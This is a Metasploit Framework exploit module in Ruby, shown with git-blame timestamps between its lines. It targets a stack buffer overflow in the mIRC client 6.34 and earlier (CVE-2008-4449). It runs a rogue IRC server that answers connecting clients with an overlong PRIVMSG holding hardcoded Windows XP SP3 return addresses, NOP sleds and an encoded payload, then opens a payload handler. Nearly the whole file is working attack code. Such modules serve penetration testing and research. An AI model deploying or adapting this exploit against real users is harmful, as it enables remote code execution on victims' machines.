2009-07-15 11:44:55 +00:00
##
2010-04-30 08:40:19 +00:00
# This file is part of the Metasploit Framework and may be subject to
2009-07-15 11:44:55 +00:00
# redistribution and commercial restrictions. Please see the Metasploit
2012-02-21 01:40:50 +00:00
# web site for more information on licensing and terms of use.
# http://metasploit.com/
2009-07-15 11:44:55 +00:00
##
class Metasploit3 < Msf :: Exploit :: Remote
2009-12-06 05:50:37 +00:00
Rank = NormalRanking
2009-07-15 11:44:55 +00:00
include Msf :: Exploit :: Remote :: TcpServer
include Msf :: Exploit :: Remote :: Seh
def initialize ( info = { } )
super ( update_info ( info ,
2010-05-09 17:45:00 +00:00
'Name' = > 'mIRC <= 6.34 PRIVMSG Handling Stack Buffer Overflow' ,
2009-07-15 11:44:55 +00:00
'Description' = > %q{
2010-04-30 08:40:19 +00:00
This module exploits a buffer overflow in the mIRC IRC Client v6 . 34 and earlier .
By enticing a mIRC user to connect to this server module , an excessively long PRIVMSG
2009-07-15 11:44:55 +00:00
command can be sent , overwriting the stack . Due to size restrictions , ordinal payloads
may be necessary . This module is based on the code by SkD .
} ,
'Author' = > [ 'patrick' ] ,
'License' = > MSF_LICENSE ,
2010-04-30 08:40:19 +00:00
'References' = >
[
2009-07-15 11:44:55 +00:00
[ 'CVE' , '2008-4449' ] ,
[ 'OSVDB' , '48752' ] ,
[ 'BID' , '31552' ] ,
2012-06-28 19:27:12 +00:00
[ 'EDB' , '6666' ]
2009-07-15 11:44:55 +00:00
] ,
'DefaultOptions' = >
{
'EXITFUNC' = > 'process' ,
} ,
'Payload' = >
{
'Space' = > 160 ,
'BadChars' = > " \x00 \x07 \x0a \x0b \x0c \x0d \x20 \x21 \x22 \x23 \x24 \x25 \x27 \x2a \x2c \x2e \x2f \x3a \x3b \x3c \x3e \x3f \x40 \x7b \x7c \x7d " , # This is mostly a guess plus some RFC info.
'StackAdjustment' = > - 3500 ,
} ,
'Platform' = > 'win' ,
'Targets' = >
[
# Patrick - Tested against xpsp3 ok 20090715
[ 'Windows XP SP3' , { 'Rets' = > [
0x7792FBD1 , # SETUPAPI.DLL pop eax pop ret
0x7FFDB5B5 ,
0x779D87B7 , # SETUPAPI.DLL 0x779D87B7 jmp esp
] } ]
] ,
'Privileged' = > false ,
'DisclosureDate' = > 'Oct 02 2008' ,
'DefaultTarget' = > 0 ) )
register_options (
[
OptPort . new ( 'SRVPORT' , [ true , " The IRC server port to listen on " , 6667 ] ) ,
OptString . new ( 'SRVNAME' , [ true , " Welcome to the ... IRC Server Name " , " Internet Relay Network " ] ) ,
] , self . class )
end
def on_client_connect ( client )
2010-04-30 08:40:19 +00:00
return if ( ( p = regenerate_payload ( client ) ) == nil )
2009-07-15 11:44:55 +00:00
print_status ( " Client connected! Sending payload... " )
buffer = " :my_irc_server.com 001 wow :Welcome to the #{ datastore [ 'SRVNAME' ] } wow \r \n "
client . put ( buffer )
end
def on_client_data ( client )
client . get_once
2010-06-22 19:11:05 +00:00
select ( nil , nil , nil , 2 )
2009-07-15 11:44:55 +00:00
sploit = " : " + Rex :: Text . rand_text_alphanumeric ( 307 ) + [ target [ 'Rets' ] [ 0 ] ] . pack ( 'V' ) + [ target [ 'Rets' ] [ 1 ] ] . pack ( 'V' )
sploit << make_nops ( 4 ) + [ target [ 'Rets' ] [ 2 ] ] . pack ( 'V' ) + make_nops ( 4 ) + " B " * 12
2010-04-30 08:40:19 +00:00
sploit << Rex :: Arch :: X86 . jmp_short ( 3 ) + Rex :: Text . rand_text_alphanumeric ( 2 )
2009-07-15 11:44:55 +00:00
sploit << make_nops ( 4 ) + payload . encoded + make_nops ( 4 ) + " PRIVMSG wow : /FINGER wow \r \n "
client . put ( sploit )
2010-04-30 08:40:19 +00:00
2009-07-15 11:44:55 +00:00
handler ( client )
service . close_client ( client )
end
end